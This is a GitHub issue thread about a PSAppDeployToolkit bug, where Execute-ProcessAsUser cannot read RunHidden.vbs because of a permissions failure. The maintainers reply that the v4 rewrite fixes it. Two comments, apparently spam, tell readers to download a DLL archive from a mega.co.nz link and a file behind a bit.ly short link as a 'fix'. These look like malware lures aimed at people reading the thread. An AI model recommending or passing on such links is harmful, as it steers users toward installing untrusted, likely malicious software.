### ISSUE TITLE
[Bug] When using the function 'Execute-ProcessAsUser' there is a problem with the RunHidden.vbs

### ISSUE THREAD

**Issue by cifagabin** [PSAppDeployToolkit/PSAppDeployToolkit#1052]
### Prerequisites

- [X] Ensure you write a short, descriptive title after [Bug] above.
- [X] Make sure to [search for any existing issues](https://github.com/psappdeploytoolkit/psappdeploytoolkit/issues) before filing a new one.
- [X] Verify you are able to reproduce the issue with the [latest released version](https://www.github.com/psappdeploytoolkit/psappdeploytoolkit/releases/latest)

### PSAppDeployToolkit version

3.10.2

### Describe the bug

When using the “Execute-ProcessAsUser” function, the following error message is returned:

![image](https://github.com/user-attachments/assets/d58e3fde-de73-4650-af4c-b2d3428fb77d)

The command used is as follows:

Execute-ProcessAsUser -Path "$PSHOME\powershell.exe" -Parameters "-ExecutionPolicy Bypass -NoProfile -NoLogo -WindowStyle Hidden -Command `"Restart-Computer`""

I think that the RunHidden.vbs is in the temp directory of the executing user (in this case, local administrator). The  logged-on user does not have local admin rights and cannot access the .vbs file in the local administrator's Local Appdata.

I gues its because permission is not applied for the .vbs file. The following line in the AppDeployToolkitMain.ps1: Set-ItemPermission -Path "$($executeAsUserTempPath)\RunHidden.vbs" -User 'Everyone' -Permission 'Read' -ErrorAction 'Stop' causes this error:

<![LOG[[Installation] :: Failed to set read permissions on path [C:\Users\Administrator\AppData\Local\Temp\PSAppDeployToolkit\PSAppDeployToolkit-ExecuteAsUser-001.xml]. The function might not be able to work correctly.]LOG]!><time="12:16:54.013120" date="09-19-2024" component="Execute-ProcessAsUser" context="G11019933\Administrator" type="2" thread="4300" file="Deploy-Application.ps1">

### Steps to reproduce

1. Use the Execute-ProcessAsUser Function in the Deploy-Application.ps1 

### Environment data

```console
OsName               : Microsoft Windows 11 Pro
OsOperatingSystemSKU : 48
OsArchitecture       : 64-Bit
WindowsVersion       : 2009
WindowsProductName   : Windows 10 Pro
WindowsBuildLabEx    : 22621.1.amd64fre.ni_release.220506-1250
OsLanguage           : en-US
OsMuiLanguages       : {en-US, de-DE}
KeyboardLayout       :
TimeZone             : (UTC+01:00) Amsterdam, Berlin, Bern, Rom, Stockholm, Wien
HyperVisorPresent    : True
CsPartOfDomain       : True
CsPCSystemType       : Mobile

.NET SDK:
 Version:           8.0.400
 Commit:            36fe6dda56
 Workload version:  8.0.400-manifests.56cd0383
 MSBuild version:   17.11.3+0c8610977

Laufzeitumgebung:
 OS Name:     Windows
 OS Version:  10.0.22631
 OS Platform: Windows
 RID:         win-x64
 Base Path:   C:\Program Files\dotnet\sdk\8.0.400\

Installierte .NET-Workloads:
Konfiguriert für die Verwendung loose manifests beim Installieren neuer Manifeste.
Es sind keine installierten Workloads zum Anzeigen vorhanden.

Host:
  Version:      8.0.8
  Architecture: x64
  Commit:       08338fcaa5

.NET SDKs installed:
  8.0.400 [C:\Program Files\dotnet\sdk]

.NET runtimes installed:
  Microsoft.AspNetCore.App 6.0.33 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 7.0.20 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 8.0.8 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.NETCore.App 6.0.33 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 7.0.20 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 8.0.8 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.WindowsDesktop.App 6.0.33 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
  Microsoft.WindowsDesktop.App 7.0.20 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
  Microsoft.WindowsDesktop.App 8.0.8 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]

Other architectures found:
  x86   [C:\Program Files (x86)\dotnet]
    registered at [HKLM\SOFTWARE\dotnet\Setup\InstalledVersions\x86\InstallLocation]

Environment variables:
  Not set

global.json file:
  Not found

Learn more:
  https://aka.ms/dotnet/info

Download .NET:
  https://aka.ms/dotnet/download
```

**Comment by wardahub-design** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

**Comment by Andrez092** [comment]
This might help:This file might fix it
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by mjr4077au** [comment]
We're not too far away from our v4 public preview release, which is going to do away with all the vbscript nonsense entirely. We'd prefer to concentrate effort there, but if more people report being affected by this issue, we'll consider an emergency hotfix for it.

**Comment by LFM8787** [comment]
Hey @cifagabin you could try this extension: [PSADT.RunAsActiveUser](https://github.com/LFM8787/PSADT.RunAsActiveUser)

It uses internal calling to impersonate the logged in user instead of VBS files in scheduled tasks.

**Comment by mjr4077au** [comment]
As this is addressed in our v4 branch which is due for a preview soon, I'll close this for now. Not too long to go!
